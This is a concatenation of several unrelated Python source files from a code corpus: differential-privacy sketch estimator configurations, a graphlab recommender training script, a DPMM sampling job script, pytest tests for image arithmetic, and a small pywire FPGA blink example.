LIQUID_LEGIONS_1E5_10_INFTY_SEQUENTIAL = SketchEstimatorConfig(
    name='liquid_legions-1e5_10-infty-sequential',
    sketch_factory=liquid_legions.LiquidLegions.get_sketch_factory(
        a=10, m=10**5),
    estimator=liquid_legions.SequentialEstimator())
def _vector_of_counts_4096_sequential(sketch_epsilon=None,
                                      estimate_epsilon=None):
  """Generate a SketchEstimatorConfig for Vector-of-Counts.

  The Vector-of-Counts sketch has a fixed length of 4096 buckets and uses the
  sequential estimator.

  Args:
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.

  Returns:
    A SketchEstimatorConfig for Vector-of-Counts of length being 4096.
  """
  # A falsy epsilon disables the corresponding (local or global) noiser.
  sketch_noiser = (
      vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
      if sketch_epsilon else None)
  estimate_noiser = (
      estimator_noisers.LaplaceEstimateNoiser(epsilon=estimate_epsilon)
      if estimate_epsilon else None)
  config_name = construct_sketch_estimator_config_name(
      sketch_name='vector_of_counts',
      sketch_config='4096',
      estimator_name='sequential',
      sketch_epsilon=sketch_epsilon,
      estimate_epsilon=estimate_epsilon)
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=vector_of_counts.VectorOfCounts.get_sketch_factory(
          num_buckets=4096),
      estimator=vector_of_counts.SequentialEstimator(),
      sketch_noiser=sketch_noiser,
      estimate_noiser=estimate_noiser)
def _meta_voc_for_exp_adbf(adbf_length, adbf_decay_rate, voc_length,
                           sketch_epsilon=None):
  """Construct the Meta VoC estimator config for Exponential ADBF sketches.

  Args:
    adbf_length: the length of the Exp-ADBF sketch.
    adbf_decay_rate: the decay rate of the Exp-ADBF sketch.
    voc_length: the length of the VoC sketch.
    sketch_epsilon: the local DP epsilon value. By default, set to None,
      meaning that there won't be local noise used.

  Returns:
    A SketchEstimatorConfig for the Exp-ADBF using the Meta VoC estimator.
  """
  # The meta sketch (VoC) is noised locally only when an epsilon is supplied.
  local_noiser = (
      None if sketch_epsilon is None
      else vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon))
  meta_estimator = meta_estimators.MetaVectorOfCountsEstimator(
      num_buckets=int(voc_length),
      adbf_estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_EXP),
      meta_sketch_noiser=local_noiser)
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='exp_bloom_filter',
          sketch_config=f'{adbf_length}_{adbf_decay_rate}',
          estimator_name=f'meta_voc_{voc_length}',
          sketch_epsilon=sketch_epsilon),
      sketch_factory=bloom_filters.ExponentialBloomFilter.get_sketch_factory(
          length=adbf_length, decay_rate=adbf_decay_rate),
      estimator=meta_estimator)
def _meta_voc_for_bf(bf_length, voc_length, sketch_epsilon=None):
  """Construct the Meta VoC estimator config for Bloom Filter sketches.

  Args:
    bf_length: the length of the Bloom Filter sketch.
    voc_length: the length of the VoC sketch.
    sketch_epsilon: the local DP epsilon value. By default, set to None,
      meaning that there won't be local noise used.

  Returns:
    A SketchEstimatorConfig for the Bloom Filter using the Meta VoC estimator.
  """
  # The meta sketch (VoC) is noised locally only when an epsilon is supplied.
  local_noiser = (
      None if sketch_epsilon is None
      else vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon))
  meta_estimator = meta_estimators.MetaVectorOfCountsEstimator(
      num_buckets=int(voc_length),
      adbf_estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_UNIFORM),
      meta_sketch_noiser=local_noiser)
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='bloom_filter',
          sketch_config=f'{bf_length}',
          estimator_name=f'meta_voc_{voc_length}',
          sketch_epsilon=sketch_epsilon),
      sketch_factory=(bloom_filters.UniformBloomFilter
                      .get_sketch_factory(length=int(bf_length))),
      estimator=meta_estimator)
def _generate_cardinality_estimator_configs():
  """Generate a tuple of cardinality estimator configs.

  Returns:
    A tuple of cardinality estimator configs.
  """
  configs = []
  # ADBF sketches (log / exp / geo) swept over length, sketch epsilon and
  # estimate epsilon.
  adbf_config_constructors = [
      _log_bloom_filter_first_moment_log,
      _exp_bloom_filter_first_moment_exp,
      _geo_bloom_filter_first_moment_geo,
  ]
  for constructor, length, sketch_epsilon, estimate_epsilon in (
      itertools.product(adbf_config_constructors, ADBF_LENGTH_LIST,
                        SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES)):
    configs.append(constructor(length, sketch_epsilon, estimate_epsilon))
  # Configs for testing global DP budget split over multiple queries.
  for length, (estimate_epsilon, estimate_delta), num_estimate_queries, \
      noise_type in itertools.product(
          ADBF_LENGTH_LIST, ESTIMATE_EPSILON_DELTA_VALUES,
          NUM_ESTIMATE_QUERIES_VALUES, [GAUSSIAN_NOISE, GEOMETRIC_NOISE]):
    configs.append(_exp_bloom_filter_first_moment_exp(
        length, estimate_epsilon=estimate_epsilon,
        estimate_delta=estimate_delta,
        num_estimate_queries=num_estimate_queries,
        noise_type=noise_type))
  # Limit test under the global DP theme (more epsilon decimals kept).
  for length, estimate_epsilon in itertools.product(
      ADBF_LENGTH_LIST, GLOBAL_DP_LIMIT_TEST_EPSILON_VALUES):
    configs.append(_exp_bloom_filter_first_moment_exp(
        length, sketch_epsilon=None, estimate_epsilon=estimate_epsilon,
        epsilon_decimals=EPSILON_DECIMALS_LIMIT_TEST))
  # Vector-of-Counts.
  for sketch_epsilon, estimate_epsilon in itertools.product(
      SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES):
    configs.append(
        _vector_of_counts_4096_sequential(sketch_epsilon, estimate_epsilon))
  # Independent estimator.
  for sketch_epsilon, estimate_epsilon in itertools.product(
      SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES):
    configs.append(
        _independent_set_estimator(sketch_epsilon, estimate_epsilon))
  # HyperLogLog++.
  configs.append(_hll_plus())
  # Meta VoC on top of Exp-ADBF.
  for voc_length, adbf_length, local_epsilon in itertools.product(
      VOC_LENGTH_LIST, ADBF_LENGTH_LIST, SKETCH_EPSILON_VALUES):
    configs.append(_meta_voc_for_exp_adbf(
        adbf_length=adbf_length,
        adbf_decay_rate=EXP_ADBF_DECAY_RATE,
        voc_length=voc_length,
        sketch_epsilon=local_epsilon))
  # Meta VoC on top of uniform BF.
  for voc_length, bf_length, local_epsilon in itertools.product(
      VOC_LENGTH_LIST, BLOOM_FILTERS_LENGTH_LIST, SKETCH_EPSILON_VALUES):
    configs.append(_meta_voc_for_bf(
        bf_length=bf_length,
        voc_length=voc_length,
        sketch_epsilon=local_epsilon))
  return tuple(configs)
def _stratiefied_sketch_vector_of_counts(max_frequency, clip, length,
                                         sketch_epsilon=None):
  """Construct configs of StratifiedSketch based on VectorOfCounts.

  Args:
    max_frequency: an integer indicating the maximum frequency to estimate.
    clip: a boolean indicating if or not to apply clipping for the
      Vector-of-Counts sketch.
    length: the length of Vector-of-Counts.
    sketch_epsilon: the DP epsilon for noising the Vector-of-Counts sketch.

  Returns:
    A SketchEstimatorConfig for stratified sketch with Vector-of-Counts as its
    base sketch.
  """
  # Downstream components take a float epsilon; float('inf') stands for
  # "no noise" when sketch_epsilon is None.
  if sketch_epsilon is not None:
    sketch_epsilon_float = sketch_epsilon
  else:
    sketch_epsilon_float = float('inf')
  sketch_operator = vector_of_counts_sketch_operator.StratifiedSketchOperator(
      clip=clip,
      epsilon=sketch_epsilon_float,
  )
  # The clipping choice is recorded in the config name.
  clip_str = 'clip' if clip else 'no_clip'
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='stratified_sketch_vector_of_counts',
          sketch_config=str(length),
          estimator_name=f'sequential_{clip_str}',
          sketch_epsilon=sketch_epsilon,
          max_frequency=str(max_frequency)),
      sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
          max_freq=max_frequency,
          cardinality_sketch_factory=(
              vector_of_counts.VectorOfCounts.get_sketch_factory(int(length))
          ),
          noiser_class=vector_of_counts.LaplaceNoiser,
          epsilon=sketch_epsilon_float,
          # epsilon_split=0: the 1+ stratum is built from the underlying
          # exact set, spending no privacy budget on it.
          epsilon_split=0,
          union=sketch_operator.union,
      ),
      estimator=stratified_sketch.SequentialEstimator(
          sketch_operator=sketch_operator,
          cardinality_estimator=vector_of_counts.SequentialEstimator(
              clip=clip,
              epsilon=sketch_epsilon_float,
          ),
      ),
      max_frequency=max_frequency,
  )
def _stratiefied_sketch_geo_adbf(
    max_frequency, length, sketch_epsilon, global_epsilon,
    epsilon_split=STRATIFIED_EXP_ADBF_EPSILON_SPLIT):
  """Construct configs of StratifiedSketch based on geometric ADBF.

  Args:
    max_frequency: an integer indicating the maximum frequency to estimate.
    length: the length of geometric ADBF.
    sketch_epsilon: the DP epsilon for noising the geometric ADBF sketch.
    global_epsilon: the global DP epsilon parameter.
    epsilon_split : Ratio of privacy budget to spend to noise 1+ sketch. When
      epsilon_split=0 the 1+ sketch is created from the underlying exact set
      directly. epsilon_split should be smaller than 1.

  Returns:
    A SketchEstimatorConfig for stratified sketch with geometric ADBF as its
    base sketch.
  """
  # Local noise: float('inf') is passed downstream to denote a noiseless
  # sketch when no local epsilon is given.
  if sketch_epsilon:
    sketch_epsilon_float = sketch_epsilon
    # The following denoiser is used by the cardinality estimator,
    # so the epsilon should be that after privacy budget (epsilon) splitting.
    sketch_denoiser = bloom_filters.SurrealDenoiser(
        epsilon=sketch_epsilon * epsilon_split)
  else:
    sketch_epsilon_float = float('inf')
    sketch_denoiser = None
  # Global noise.
  if global_epsilon is not None:
    estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
        epsilon=global_epsilon)
  else:
    estimate_noiser = None
  # Strata are combined with the expectation-approximation operator
  # specialized for the geometric estimation method.
  sketch_operator = (
      bloom_filter_sketch_operators.ExpectationApproximationSketchOperator(
          estimation_method=bloom_filters.FirstMomentEstimator.METHOD_GEO))
  # Keep length * probability constant across sketch lengths.
  probability = GEO_LENGTH_PROB_PRODUCT / length
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='stratified_sketch_geo_adbf',
          sketch_config=f'{length}_{probability:.6f}',
          estimator_name='first_moment_estimator_geo_expectation',
          sketch_epsilon=sketch_epsilon,
          estimate_epsilon=global_epsilon,
          max_frequency=str(max_frequency)),
      sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
          max_freq=max_frequency,
          cardinality_sketch_factory=(
              bloom_filters.GeometricBloomFilter.get_sketch_factory(
                  length=length, probability=probability)
          ),
          noiser_class=bloom_filters.BlipNoiser,
          epsilon=sketch_epsilon_float,
          epsilon_split=epsilon_split,
          union=sketch_operator.union,
      ),
      estimator=stratified_sketch.SequentialEstimator(
          sketch_operator=sketch_operator,
          cardinality_estimator=bloom_filters.FirstMomentEstimator(
              method=bloom_filters.FirstMomentEstimator.METHOD_GEO,
              denoiser=sketch_denoiser,
              noiser=estimate_noiser,
          ),
      ),
      max_frequency=max_frequency,
  )
def _stratiefied_sketch_exponential_adbf(
    max_frequency, length, sketch_epsilon, global_epsilon,
    sketch_operator_type,
    epsilon_split=STRATIFIED_EXP_ADBF_EPSILON_SPLIT):
  """Construct configs of StratifiedSketch based on Exponential ADBF.

  Args:
    max_frequency: an integer indicating the maximum frequency to estimate.
    length: the length of Exponential ADBF.
    sketch_epsilon: the DP epsilon for noising the Exponential ADBF sketch.
    global_epsilon: the global DP epsilon parameter.
    sketch_operator_type: one of 'bayesian' and 'expectation'.
    epsilon_split : Ratio of privacy budget to spend to noise 1+ sketch. When
      epsilon_split=0 the 1+ sketch is created from the underlying exact set
      directly. epsilon_split should be smaller than 1.

  Returns:
    A SketchEstimatorConfig for stratified sketch with Exponential ADBF as its
    base sketch.

  Raises:
    ValueError: if the sketch_operator is not one of 'bayesian' and
      'expectation'.
  """
  # Local noise: float('inf') is passed downstream to denote a noiseless
  # sketch when no local epsilon is given.
  if sketch_epsilon:
    sketch_epsilon_float = sketch_epsilon
    # The following denoiser is used by the cardinality estimator,
    # so the epsilon should be that after privacy budget (epsilon) splitting.
    sketch_denoiser = bloom_filters.SurrealDenoiser(
        epsilon=sketch_epsilon * epsilon_split)
  else:
    sketch_epsilon_float = float('inf')
    sketch_denoiser = None
  # Global noise.
  if global_epsilon is not None:
    estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
        epsilon=global_epsilon)
  else:
    estimate_noiser = None
  if sketch_operator_type == SKETCH_OPERATOR_EXPECTATION:
    sketch_operator = (
        bloom_filter_sketch_operators.ExpectationApproximationSketchOperator(
            estimation_method=bloom_filters.FirstMomentEstimator.METHOD_EXP))
  elif sketch_operator_type == SKETCH_OPERATOR_BAYESIAN:
    sketch_operator = (
        bloom_filter_sketch_operators.BayesianApproximationSketchOperator(
            estimation_method=bloom_filters.FirstMomentEstimator.METHOD_EXP))
  else:
    # Bug fix: these string parts were missing the f prefix, so the braces
    # were emitted literally instead of interpolating the supported names
    # (compare the correct usage in _exp_bloom_filter_first_moment_exp).
    raise ValueError('sketch operator should be one of '
                     f'"{SKETCH_OPERATOR_BAYESIAN}" and '
                     f'"{SKETCH_OPERATOR_EXPECTATION}".')
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='stratified_sketch_exp_adbf',
          sketch_config=f'{length}_{EXP_ADBF_DECAY_RATE}',
          estimator_name=f'first_moment_estimator_exp_{sketch_operator_type}',
          sketch_epsilon=sketch_epsilon,
          estimate_epsilon=global_epsilon,
          max_frequency=str(max_frequency)),
      sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
          max_freq=max_frequency,
          cardinality_sketch_factory=(
              bloom_filters.ExponentialBloomFilter.get_sketch_factory(
                  length=length, decay_rate=EXP_ADBF_DECAY_RATE)
          ),
          noiser_class=bloom_filters.BlipNoiser,
          epsilon=sketch_epsilon_float,
          epsilon_split=epsilon_split,
          union=sketch_operator.union,
      ),
      estimator=stratified_sketch.SequentialEstimator(
          sketch_operator=sketch_operator,
          cardinality_estimator=bloom_filters.FirstMomentEstimator(
              method=bloom_filters.FirstMomentEstimator.METHOD_EXP,
              denoiser=sketch_denoiser,
              noiser=estimate_noiser,
          ),
      ),
      max_frequency=max_frequency,
  )
def _exact_multi_set(max_frequency):
  """Generate a lossless SketchEstimatorConfig based on an exact multi-set.

  Args:
    max_frequency: the maximum frequency level to estimate.

  Returns:
    A SketchEstimatorConfig that tracks the multiset exactly.
  """
  config_name = construct_sketch_estimator_config_name(
      sketch_name='exact_multi_set',
      sketch_config='10000',
      estimator_name='lossless',
      max_frequency=str(int(max_frequency)))
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=exact_set.ExactMultiSet.get_sketch_factory(),
      estimator=exact_set.LosslessEstimator(),
      max_frequency=max_frequency)
def _exp_same_key_aggregator(max_frequency, global_epsilon, length):
  """Create an ExponentialSameKeyAggregator config.

  Args:
    max_frequency: the maximum frequency to estimate.
    global_epsilon: the global DP epsilon parameter.
    length: the length of the ExponentialSameKeyAggregator.

  Returns:
    A SketchEstimatorConfig of ExponentialSameKeyAggregator.
  """
  # Only the noiser class is chosen here; the estimator instantiates it
  # from the epsilon passed below.
  estimate_noiser_class = (
      None if global_epsilon is None
      else estimator_noisers.GeometricEstimateNoiser)
  config_name = construct_sketch_estimator_config_name(
      sketch_name='exp_same_key_aggregator',
      sketch_config='_'.join([str(int(length)), '10']),
      estimator_name='standardized_histogram',
      estimate_epsilon=global_epsilon,
      max_frequency=str(max_frequency))
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=(
          same_key_aggregator.ExponentialSameKeyAggregator.get_sketch_factory(
              length, decay_rate=EXP_ADBF_DECAY_RATE)),
      estimator=same_key_aggregator.StandardizedHistogramEstimator(
          max_freq=max_frequency,
          noiser_class=estimate_noiser_class,
          epsilon=global_epsilon,
      ),
      max_frequency=max_frequency)
def _generate_frequency_estimator_configs(max_frequency):
  """Create frequency estimator configurations.

  Args:
    max_frequency: an integer indicating the maximum frequency to estimate.

  Returns:
    A tuple of frequency estimator configs.
  """
  configs = []
  # Stratified Sketch based on Vector-of-Counts.
  for epsilon, clip, length in itertools.product(SKETCH_EPSILON_VALUES,
                                                 [False, True],
                                                 VOC_LENGTH_LIST):
    configs.append(
        _stratiefied_sketch_vector_of_counts(max_frequency, clip, length,
                                             epsilon)
    )
  # Stratified Sketch based on exponential ADBF.
  for sketch_epsilon, global_epsilon, length, sketch_operator_type in (
      itertools.product(
          SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES, ADBF_LENGTH_LIST,
          SKETCH_OPERATOR_LIST)):
    configs.append(
        _stratiefied_sketch_exponential_adbf(max_frequency, length,
                                             sketch_epsilon, global_epsilon,
                                             sketch_operator_type)
    )
  # Stratified Sketch based on geometric ADBF.
  for sketch_epsilon, global_epsilon, length in (
      itertools.product(
          SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES, ADBF_LENGTH_LIST)):
    configs.append(
        _stratiefied_sketch_geo_adbf(max_frequency, length,
                                     sketch_epsilon, global_epsilon)
    )
  # Exact set.
  configs.append(_exact_multi_set(max_frequency))
  # Same-key-aggregator.
  for global_epsilon, length in itertools.product(ESTIMATE_EPSILON_VALUES,
                                                  ADBF_LENGTH_LIST):
    configs.append(
        _exp_same_key_aggregator(max_frequency, global_epsilon, length))
  return tuple(configs)
def get_estimator_configs(estimator_names, max_frequency):
  """Returns a list of estimator configs by name.

  Args:
    estimator_names: a list of estimators defined in the evaluation_configs.
    max_frequency: an integer value of the maximum frequency level.

  Returns:
    A list of SketchEstimatorConfig.

  Raises:
    ValueError: if the estimator_names is not given, or any element of
      estimator_names is not defined in the evaluation_configs.
  """
  if not estimator_names:
    raise ValueError('No estimators were specified.')
  # Index every known config by its constructed name.
  all_estimators = {
      conf.name: conf for conf in
      _generate_cardinality_estimator_configs()
      + _generate_frequency_estimator_configs(max_frequency)}
  invalid_estimator_names = [name for name in estimator_names
                             if name not in all_estimators]
  if invalid_estimator_names:
    raise ValueError('Invalid estimator(s): {}\nSupported estimators: {}'.
                     format(','.join(invalid_estimator_names),
                            ',\n'.join(all_estimators.keys())))
  return [all_estimators[name] for name in estimator_names]
| StarcoderdataPython |
3283452 | <filename>model.py
from __future__ import print_function
import matplotlib as mpl
mpl.use('Agg') # Don't open display
import matplotlib.pyplot as plt
import numpy as np
import io
import logging
import graphlab as gl
from datetime import datetime
from termcolor import colored, cprint
import mailer
import os
import json
logger = logging.getLogger()
def run(conf):
    """Train factorization recommenders with 1..N latent factors and email a plot.

    For each factor count, fits a graphlab factorization recommender on
    ratings.csv, collects the training RMSE, plots RMSE vs. number of latent
    factors, saves the plot as an SVG, and emails it.

    Args:
        conf: dict with keys 'to' (recipient address), 'method' (solver name),
            'latent_factors' (max number of factors), 'path' (directory
            containing ratings.csv).
    """
    to = conf['to']
    method = conf['method']
    latent_factors = list(range(1,conf['latent_factors']+1))
    path = conf['path']
    # Timestamp-based name so successive runs don't overwrite each other.
    plot_filename = str(datetime.utcnow())
    logger.info('Reading ratings.csv ...')
    movies = gl.SFrame.read_csv(os.path.join(path, 'ratings.csv'),
                                column_type_hints=[int,int,float,int])
    logger.info('Reading complete')
    data = []
    logger.info('Training model ...')
    # Train one model per latent-factor count and record its training RMSE.
    for i in latent_factors:
        m = gl.recommender.factorization_recommender.create(movies,
                                                            user_id='userId',
                                                            item_id='movieId',
                                                            target='rating',
                                                            num_factors=i,
                                                            solver=method,
                                                            verbose=False)
        logger.info('Processing... {0}'.format(i))
        rmse = m.get('training_rmse')
        data.append(rmse)
    plt.plot(latent_factors, data)
    plt.xlabel('Number of latent factors')
    plt.ylabel('RMSE')
    # NOTE(review): 'comparsion' is a typo in the rendered plot title.
    plt.title('Number of latent factors in comparsion with RMSE')
    logger.info('Saving plot to disc ...')
    plt.savefig('{0}.svg'.format(plot_filename))
    logger.info('Save complete')
    # Render the same figure into an in-memory buffer for the email payload.
    buf = io.BytesIO()
    plt.savefig(buf, format = 'svg')
    buf.seek(0)
    mail = mailer.Mailer(os.path.join('./Credentials','credentials.json'))
    mail.send(
        toaddrs=to,
        fromaddrs='<EMAIL>',
        subject='Recommender engine',
        body='Method used = {0}\nLatent_factors = {1}'.format(method,
                                                             len(latent_factors)),
        payload=('{0}.svg'.format(plot_filename), buf))
| StarcoderdataPython |
3236005 | # -*- coding: utf-8 -*-
import sys
import numpy as np
import tables
import cPickle as pickle
from Dpmm import DPMM
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
### Job submit script for Gibbs sampling on reference population model
# read arguments
p = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
p.add_argument('algorithm', metavar='<inference-algorithm>',
choices=['gibbs','split_merge'],
help='inference algorithm to test')
p.add_argument('-i', metavar='<inputfile>',
help='input hdf5 file containing the data')
p.add_argument('-a', metavar='array', default='/reduced_samples/reference_double_sized_seed_54321/reference_pop',
help='path to data node within the input file')
p.add_argument('--alpha', type=float, metavar='<alpha>', default=1.0,
help='concentration parameter for the DP')
p.add_argument('--num-itns', type=int, metavar='<num-itns>', default=1000,
help='number of iterations')
p.add_argument('--save', metavar='<save>',
help='pickle the DPMM to this file')
args = p.parse_args()
# load data
try:
h5file = tables.open_file(args.i,'r')
node = h5file.get_node(args.a)
X = node.read()
except:
print "Couldn't read data %s from file %s " %(args.s, args.i)
sys.exit()
finally:
h5file.close()
# initialize DPMM
pre_alpha = 1.0
n_components = pre_alpha * np.log(X.shape[0])
# dump args to stdout
for arg in vars(args):
print arg, ": ", getattr(args, arg)
if args.algorithm == 'gibbs':
dpmm = DPMM(n_components=n_components.astype(int),alpha=pre_alpha,do_sample_alpha=True)
dpmm.fit_collapsed_Gibbs(X,do_kmeans=False,max_iter=args.num_itns,do_init=True)
elif args.algorithm == 'split_merge':
dpmm = DPMM(n_components=1,alpha=pre_alpha,do_sample_alpha=True)
dpmm.fit_conjugate_split_merge(X,do_kmeans=False,max_iter=args.num_itns,do_init=True)
# save the dpmm to outfile
pickle.dump(dpmm, open( args.save, "wb" ) )
| StarcoderdataPython |
1644514 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import numpy.testing as npt
import pytest
import pytest_check as check
from astropop.image_processing.imarith import imarith
from astropop.framedata import FrameData
# TODO: Test with None FrameData
# TODO: Test with None scalar values
# TODO: '%' and '**' functions
# Parametrization shared by the arithmetic tests (applied via @pars): each
# case gives the operand frames 'f1'/'f2' and the expected result 'r' as
# {'v': pixel value, 'u': uncertainty-or-None} for one operator. For '+'/'-'
# uncertainties combine in quadrature (3, 4 -> 5).
pars = pytest.mark.parametrize('op,vs', [('+', {'f1': {'v': 30, 'u': None},
                                                'f2': {'v': 10, 'u': None},
                                                'r': {'v': 40, 'u': None}}),
                                         ('+', {'f1': {'v': 30, 'u': 3},
                                                'f2': {'v': 10, 'u': 4},
                                                'r': {'v': 40, 'u': 5}}),
                                         ('-', {'f1': {'v': 30, 'u': None},
                                                'f2': {'v': 10, 'u': None},
                                                'r': {'v': 20, 'u': None}}),
                                         ('-', {'f1': {'v': 30, 'u': 3},
                                                'f2': {'v': 10, 'u': 4},
                                                'r': {'v': 20, 'u': 5}}),
                                         ('*', {'f1': {'v': 5, 'u': None},
                                                'f2': {'v': 6, 'u': None},
                                                'r': {'v': 30, 'u': None}}),
                                         ('*', {'f1': {'v': 5, 'u': 0.3},
                                                'f2': {'v': 6, 'u': 0.4},
                                                'r': {'v': 30,
                                                      'u': 2.022375}}),
                                         ('/', {'f1': {'v': 10, 'u': None},
                                                'f2': {'v': 3, 'u': None},
                                                'r': {'v': 3.33333333,
                                                      'u': None}}),
                                         ('/', {'f1': {'v': 10, 'u': 1},
                                                'f2': {'v': 3, 'u': 0.3},
                                                'r': {'v': 3.33333333,
                                                      'u': 0.47140452}}),
                                         ('//', {'f1': {'v': 10, 'u': None},
                                                 'f2': {'v': 3, 'u': None},
                                                 'r': {'v': 3.000000,
                                                       'u': None}}),
                                         ('//', {'f1': {'v': 10, 'u': 1},
                                                 'f2': {'v': 3, 'u': 0.3},
                                                 'r': {'v': 3.000000,
                                                       'u': 0.424264}})])
@pytest.mark.parametrize('handle_mask', [True, False])
@pytest.mark.parametrize('inplace', [True, False])
@pars
def test_imarith_ops_frames(op, vs, inplace, handle_mask):
    """Check imarith data, uncertainty and mask handling for each operator."""
    # One-element list so gen_frame (a closure) can flag that at least one
    # operand carries an uncertainty; rebound to a plain bool further down.
    propag_errors = [False]  # use list so gen_frame can mutate the flag
    def gen_frame(v):
        # Build a 10x10 constant frame from a {'v': value, 'u': uncert} dict.
        shape = (10, 10)
        if v['u'] is None:
            frame = FrameData(np.ones(shape, dtype='f8'), unit='adu')
        else:
            frame = FrameData(np.ones(shape, dtype='f8'), unit='adu',
                              uncertainty=v['u'])
            propag_errors[0] = True  # noqa
        frame.data[:] = v['v']
        return frame
    frame1 = gen_frame(vs['f1'])
    frame2 = gen_frame(vs['f2'])
    exp_res = gen_frame(vs['r'])
    if handle_mask:
        # Mask one distinct pixel per operand; the result mask must be the
        # union of both.
        mask1 = np.zeros((10, 10))
        mask2 = np.zeros((10, 10))
        mask1[5, 5] = 1
        mask2[3, 3] = 1
        exp_mask = np.zeros((10, 10))
        exp_mask[5, 5] = 1
        exp_mask[3, 3] = 1
        frame1.mask = mask1
        frame2.mask = mask2
        exp_res.mask = exp_mask
    propag_errors = propag_errors[0]
    res = imarith(frame1, frame2, op, inplace=inplace,
                  propagate_errors=propag_errors,
                  handle_mask=handle_mask)
    npt.assert_array_almost_equal(res.data, exp_res.data)
    if propag_errors:
        npt.assert_array_almost_equal(res.uncertainty,
                                      exp_res.uncertainty)
    if handle_mask:
        npt.assert_array_equal(res.mask, exp_res.mask)
    # inplace=True must return the first operand itself, not a copy.
    if inplace:
        check.is_true(res is frame1)
    else:
        check.is_false(res is frame1)
def test_invalid_op():
    """imarith must reject an unknown operator string with ValueError."""
    lhs = FrameData(np.zeros((10, 10)), unit='')
    rhs = FrameData(np.zeros((10, 10)), unit='')
    with pytest.raises(ValueError) as exc:
        imarith(lhs, rhs, 'not an op')
    check.is_in('not supported', str(exc.value))
def test_invalid_shapes():
    """imarith must reject operands whose shapes differ."""
    lhs = FrameData(np.zeros((10, 10)), unit='')
    rhs = FrameData(np.zeros((5, 5)), unit='')
    with pytest.raises(ValueError):
        imarith(lhs, rhs, '+')
| StarcoderdataPython |
5112130 | <filename>examples/blink_example.py
from pywire import *
# 26-bit free-running counter used as a clock divider.
# NOTE(review): pywire translates the driver functions' source to VHDL, so
# only '#' comments are added here; code is left untouched.
counter = Signal(26)
def increment(x):
    # Next-state logic: the counter advances by one each cycle.
    return x+1
counter.drive(increment, args=counter)
# One-bit output signal mapped to the LED pin P134.
led1 = Signal(1, io="out", port="P134")
def blink(slow_clock):
    # LED on for the upper half of the 2**26 counter range, off otherwise.
    if slow_clock > 2**25:
        return 1
    else:
        return 0
led1.drive(blink, args=(counter))
# Emit the generated VHDL and a timing report (50 on pin 'P56', Xilinx).
print(vhdl(globals(), name="blink_example"))
print(timing(globals(), 50, 'P56', vendor="Xilinx"))
print(timing(globals(), 50, 'P56', vendor="Xilinx")) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.